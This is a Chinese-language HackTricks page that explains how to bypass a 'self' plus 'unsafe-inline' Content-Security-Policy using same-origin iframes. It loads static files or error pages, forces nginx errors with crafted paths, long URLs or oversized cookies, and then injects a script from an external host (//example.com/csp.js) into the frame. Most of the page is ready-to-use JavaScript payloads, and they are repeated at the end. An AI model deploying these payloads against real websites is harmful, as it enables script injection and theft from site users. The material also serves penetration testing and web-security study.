CSP bypass: self + 'unsafe-inline' with Iframes

学习与实践 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) 学习与实践 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享黑客技巧。

一个这样的配置:

Content-Security-Policy: default-src 'self' 'unsafe-inline';

禁止使用任何作为字符串传输的代码执行函数。例如：eval, setTimeout, setInterval 都会因为设置 unsafe-eval 而被阻止。

来自外部来源的任何内容也会被阻止，包括图像、CSS、WebSockets，尤其是 JS。

通过文本和图像

观察到现代浏览器将图像和文本转换为 HTML 以增强其显示效果（例如，设置背景、居中等）。因此，如果通过 iframe 打开图像或文本文件，例如 favicon.ico 或 robots.txt，它会被呈现为 HTML。值得注意的是，这些页面通常缺少 CSP 头，并且可能不包含 X-Frame-Options，从而允许从中执行任意 JavaScript：

frame=document.createElement("iframe");
frame.src="/css/bootstrap.min.css";
document.body.appendChild(frame);
script=document.createElement('script');
script.src='//example.com/csp.js';
window.frames[0].document.head.appendChild(script);

通过错误

类似地，错误响应，如文本文件或图像，通常没有CSP头，并且可能省略X-Frame-Options。可以诱导错误在iframe中加载，从而允许以下操作：

// Inducing an nginx error
frame=document.createElement("iframe");
frame.src="/%2e%2e%2f";
document.body.appendChild(frame);

// Triggering an error with a long URL
frame=document.createElement("iframe");
frame.src="/"+"A".repeat(20000);
document.body.appendChild(frame);

// Generating an error via extensive cookies
for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)};
frame=document.createElement("iframe");
frame.src="/";
document.body.appendChild(frame);
// Removal of cookies is crucial post-execution
for(var i=0;i<5;i++){document.cookie=i+"="}

在触发上述任何场景后，可以通过以下方式在iframe中实现JavaScript执行：

script=document.createElement('script');
script.src='//example.com/csp.js';
window.frames[0].document.head.appendChild(script);

参考文献

https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。

PreviousContent Security Policy (CSP) Bypass NextCookies Hacking

Last updated 4 months ago

frame=document.createElement("iframe"); frame.src="/css/bootstrap.min.css"; document.body.appendChild(frame); script=document.createElement('script'); script.src='//example.com/csp.js'; window.frames[0].document.head.appendChild(script);

// Inducing an nginx error frame=document.createElement("iframe"); frame.src="/%2e%2e%2f"; document.body.appendChild(frame); // Triggering an error with a long URL frame=document.createElement("iframe"); frame.src="/"+"A".repeat(20000); document.body.appendChild(frame); // Generating an error via extensive cookies for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)}; frame=document.createElement("iframe"); frame.src="/"; document.body.appendChild(frame); // Removal of cookies is crucial post-execution for(var i=0;i<5;i++){document.cookie=i+"="}